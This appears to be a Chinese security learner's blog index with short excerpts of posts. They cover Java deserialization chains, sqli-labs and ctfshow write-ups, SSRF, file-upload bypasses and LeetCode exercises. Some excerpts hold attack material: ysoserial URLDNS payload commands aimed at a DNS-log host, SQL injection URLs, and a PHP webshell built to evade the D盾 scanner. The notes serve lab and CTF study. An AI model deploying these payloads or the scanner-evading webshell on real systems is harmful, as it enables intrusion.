- 博客(23)
- 收藏
- 关注
RSS订阅原创 java反序列化CC1链分析(LazyMap)
LazyMap类LazyMap.decorate//factory成员数据类型为Transformer并且我们可以控制,且该方法为public访问权限 protected final Transformer factory; public static Map decorate(Map map, Transformer factory) { return new LazyMap(map, factory); }LazyMap.get该方法中的factory属性调
2022-03-17 20:02:38
1012
原创 java 反序列化CC1链分析(TransformedMap)
Map类 --> TransformedMapMap类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。TransformedMap.decorate方法
2022-03-14 19:57:03
1450
原创 JAVA基础动态代理
静态代理用法创建一个接口,然后创建被代理的类实现该接口并且实现该接口中的抽象方法。之后再创建一个代理类,同时使其也实现这个接口。在代理类中持有一个被代理对象的引用,而后在代理类方法中调用该对象的方法。接口:public interface HelloInerface { void sayHello();}被代理类:public class Hello implements HelloInerface{ public void sayHello(){ Sys
2022-03-14 19:25:16
366
原创 Java 反序列化URLDNS利用链 调试分析
事前准备他的利用链 * Gadget Chain: * HashMap.readObject() * HashMap.putVal() * HashMap.hash() * URL.hashCode()生成payload:java -jar ysoserial.jar URLDNS http://xxx.ceye.io >out.binjava -jar ysoserial.jar URLDNS http://kjo3
2022-03-10 19:55:04
1197
原创 java基础之反射
获取Class类得到Class类有三种方法:.class,在加载了某个类的情况下,直接拿它的属性即可,例如:Runtime.class。obj.getClass()。如果存在某个类的实例obj,那么可以通过getClass()方法得到这个类对应的Class。Class.forName,也是最常用的。知道了那个类的完整名字后(包括包名),作为参数即可:Class clazz = Class.forName("java.lang.Runtime");获取成员变量FieldClass类有这些获取属性
2022-03-09 19:40:26
293
原创 sqllabs 闯关wp
Less 1首先先测试为字符型,并且干扰字符为 单引号 ,所以构造语句如下http://192.168.9.128/sqli-labs/Less-1/?id=1%27%20--+ 爆字段http://192.168.9.128/sqli-labs/Less-1/?id=1' order by 3--+爆表不要忘了 group_concat 函数http://192.168.9.128/sqli-labs/Less-1/?id=999' union select 1,group_con
2021-07-20 22:48:51
260
原创 python练习
题目给定一个非负整数数组 A,返回一个数组,在该数组中, A 的所有偶数元素之后跟着所有奇数元素。你可以返回满足此条件的任何数组作为答案。思路通过自定义比较函数调用sort,将所有偶数视为0,奇数视为1,简单暴力代码class Solution(object): def sortArrayByParity(self, A): A.sort(key = lambda x: x % 2) return A...
2021-06-09 21:40:24
173
2
原创 python练习6.8
题目给你一个数字数组 arr 。如果一个数列中,任意相邻两项的差总等于同一个常数,那么这个数列就称为 等差数列 。如果可以重新排列数组形成等差数列,请返回 true ;否则,返回 false 。例:输入:arr = [3,5,1]输出:true解释:对数组重新排序得到 [1,3,5] 或者 [5,3,1] ,任意相邻两项的差分别为 2 或 -2 ,可以形成等差数列。代码class Solution: def canMakeArithmeticProgression(self,
2021-06-08 21:59:43
194
1
原创 python练习6.7
题目给定只含 “I”(增大)或 “D”(减小)的字符串 S ,令 N = S.length。返回 [0, 1, …, N] 的任意排列 A 使得对于所有 i = 0, …, N-1,都有:如果 S[i] == “I”,那么 A[i] < A[i+1]如果 S[i] == “D”,那么 A[i] > A[i+1]思路我们维护当前未使用的最小和最大的数,它们对应的区间为当前未使用的数的集合。从左向右扫描字符串,如果碰到 ‘I’,就取出当前最小的数,否则取出当前最大的数。代码class
2021-06-07 21:47:01
191
1
原创 python练习6.6
题目给你一个整数数组 nums 。数组中唯一元素是那些只出现 恰好一次 的元素。请你返回 nums 中唯一元素的 和 。例:输入:nums = [1,2,3,2]输出:4解释:唯一元素为 [1,3] ,和为 4 。解题思路对列表里的每一个元素计数,计数为1,元素放入新列表代码class Solution: def sumOfUnique(self, nums: List[int]) -> int: new_nums=[] for i in
2021-06-06 21:22:45
367
原创 python练习6.5
题目给你一个由不同字符组成的字符串 allowed 和一个字符串数组 words 。如果一个字符串的每一个字符都在 allowed 中,就称这个字符串是 一致字符串 。请你返回 words 数组中 一致字符串 的数目。思路暴力法枚举words中所有元素的各个字母,利用find判断该字母是否包含在allowed中,如果包含则count++,最后计算count的值是否和原字符串长度相等,如果相等则结果ret+1。代码class Solution: def countConsistentStr
2021-06-05 23:36:10
191
原创 python练习6.3
题目给你一个数组 nums ,数组中有 2n 个元素,按 [x1,x2,…,xn,y1,y2,…,yn] 的格式排列。请你将数组按 [x1,y1,x2,y2,…,xn,yn] 格式重新排列,返回重排后的数组。思路:便利中用append从两边向中间加入代码class Solution: def shuffle(self, nums, n): list = [] for i in range(1, n+1): list.append(nu
2021-06-03 21:18:40
163
原创 python练习6.2
题目给定一个整数数组 nums 和一个整数目标值 target,请你在该数组中找出 和为目标值 target 的那 两个 整数,并返回它们的数组下标。你可以假设每种输入只会对应一个答案。但是,数组中同一个元素在答案里不能重复出现。你可以按任意顺序返回答案。来源:力扣(LeetCode)链接:https://leetcode-cn.com/problems/two-sum著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。代码def twoSum(nums, target):
2021-06-02 23:09:24
186
原创 iscc wp
WEBISCC客服冲冲冲(一)前端控制,所以解法很多,比如用连点器,或者在 Console 里搜一下,有个 votes,直接设置,这道题可以说有非常多解题方法了,这里就不再过多阐述这是啥直接复制到控制台回车得到flagWeb01打开便提示Why don’t you take a look at robots.txt?那就访问robots.txt看看呗,发现Disallow: /src/code/code.txt所以就访问http://39.96.91.106:7040/code/code
2021-05-28 20:41:31
450
1
原创 c++有关const 的几种情况 与运算符重载
当 const 和指针在一起时当 const 与函数参数在一起时一二三用const修饰返回值是表示返回的为一个引用,而不是将对象复制返回,增强效率!!同时,上面第三种情况需要对需要调用成员的函数“增强信任感”(即在函数体前加 const ,表示不修改成员的值只是调用他们! )当我们用函数重载重新定义符号时,根据下面基本符号运算,运算结束后,num1与num2的值没有发生变化:int num1,num2,num3;num1=num2=1;num3=num1+num2;故我们在
2021-05-26 17:16:36
496
原创 xml基础
xml基础xml与html的不同在学习xml之前,我以为xml与html差不多,了解后才发现,两者走的完全是两个方向!简单来说:XML 被设计用来传输和存储数据。HTML 被设计用来显示数据。XML 被设计用来结构化、存储以及传输信息,就拿下面的John 写给 George 的便签来说:<note><to>George</to><from>John</from><heading>Reminder</headin
2021-04-18 13:31:48
162
原创 ssrf总结
基本常识一先来了解一下概念吧:也就是说:能够对外发起请求的web应用都可能存在ssrf漏洞!那么,要怎么判断确实存在漏洞呢回显 当输入一个url返回一个对应的页面,例如输入www.baidu.com 会返回百度页面响应时长 当访问一个页面上面的圈圈一直在转动的话,例如国内访问 谷歌DNS请求 利用类似DNSlog的网站利用 nc 监听 在本地设置一个监听端口 ,用目标来访问二相关函数:file_get_contents:例如:看是否存在漏洞,看他是否能访问内网
2021-04-15 20:38:27
212
1
原创 文件上传几种类型
1、客户端校验抓包改后缀关掉js (谷歌:设置=>高级 隐私和安全性=>网站设置)2、服务端校验(content-type)改字段是根据你上传文件名所显现出来的绕过方法:抓包改content-type 字段改文件名后上传抓包后再改回文件名上传 正常文件改文件内容最终目的是:…该字段正确就ok3、服务端校验—黑名单(名单中有的不能过)常见几种绕过姿势:大小写绕过,例如Php、PhP常见的后缀 php3456 pht phtml …配合Apache 的
2021-04-07 21:05:05
1365
原创 简单绕过d 盾 (免杀马)
用代码执行的思路绕过,设置一个类,把他绕晕(手动滑稽)<?phpClass hello{ public function pingjie(){ $a="ass"; $b="ert"; return $a.$b; } public function __construct($str){ $this->name = $str; } public function __destruct(){ $t=$this->pingjie(); $t($this
2021-03-29 20:15:51
604
原创 ctfshow web 入门 ssrf
351、curl造成的ssrfpayload:352、加了限定:这是从其他师傅那里拿来的payload:353、同上吧,姿势随意一点!!354、看了yu4傅的wp,用到 http://sudo.cc/,这就是个解析到127.0.0.1的域名,直接用即可。355、...
2021-02-25 15:28:19
207
原创 ctfshow web 入门 sql注入
171、常规题型(需要把前面数字换为-1,注释用 --+)查数据库payload = “-1’union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+”查列名payload="-1’union select 1,2,group_concat(column_name) from information_schema.columns where ta
2021-02-23 19:02:06
270
原创 ctfshow web 入门 php特性
89、用不为空数组绕过90、91、第一次匹配php可以换行匹配(),利用这点可用%0a绕过92、同9093、用八进制94、小数绕过95、前面加空格绕过(或者前面加一个‘+’)96、./表示当前路径下面是从其他师傅那里拿来的解法97、...
2021-02-22 17:37:48
237
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人